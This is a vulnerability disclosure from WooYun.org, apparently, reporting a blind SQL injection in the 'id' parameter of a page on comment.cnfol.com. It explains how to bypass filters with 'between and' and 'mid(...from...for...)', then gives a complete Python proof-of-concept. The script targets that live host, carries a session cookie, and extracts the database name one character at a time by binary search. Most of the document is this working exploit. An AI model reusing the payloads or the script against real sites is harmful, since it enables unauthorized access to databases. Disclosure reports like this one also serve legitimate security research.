WooYun.org

http://comment.cnfol.com/yanbao/index.php?tid=4&id=5541参数id过滤不严格，绕过sql注入，绕过方法：采用between and绕过大于号小于号，采用mid(database()from(i)for(1))绕过逗号进行盲注，即逐个注入出database()中每个字符。。
poc如下：
import re
import time
from optparse import OptionParser
import httplib
import HTMLParser

def send(url,paras):
httpClient=None
headers={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36',
'connection':'keep-alive',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Host': 'comment.cnfol.com',
'Cookie': 'PHPSESSID=unuga8b4f4ae06j75a848i5vr2; Hm_lvt_99fca30d7bebcbcdbc6c42dc4d469b04=1440862713,1440863012,1440863018,1440901489; Hm_lpvt_99fca30d7bebcbcdbc6c42dc4d469b04=1440902531'}
httpClient = httplib.HTTPConnection(url, 80, timeout=30)
httpClient.request('GET', '/yanbao/index.php?tid=4&id=5541'+paras.replace(' ','%20'),'',headers)
response = httpClient.getresponse()
html_parser = HTMLParser.HTMLParser()
txt = html_parser.unescape(response.read(116).decode("utf-8"))
p = re.compile("<title>(.+?)</title>")
txt=p.findall(txt)
if txt:
return True
else:
return False
def binary_sqli(url,left,right,index):
while 1:
mid = (left + right)/2
if mid==left:
return chr(mid+1)
pyload = ' and ascii(mid(database()from(%s)for(1))) between 0 and %s' % (index, mid)
if send(url,pyload):
right = mid
else:
left = mid

def main():
#http_proxy("http://127.0.0.1:8089")
parser = OptionParser()
parser.add_option("-u", "--url", action="store", dest="url", default=False, type="string",help="test url")
(options, args) = parser.parse_args()
if(options.url):
url = options.url
else:
return
print "starting..."
database = ''
for i in range(1,9):
database+=binary_sqli(url,48,122,i)
print 'The %sst character of the database is: %s' % (i,database[i-1])
print "The database is %s" % database
if __name__=="__main__":
start =time.clock()
main()
end = time.clock()
print ("The function run time is : %.03f seconds" %(end-start))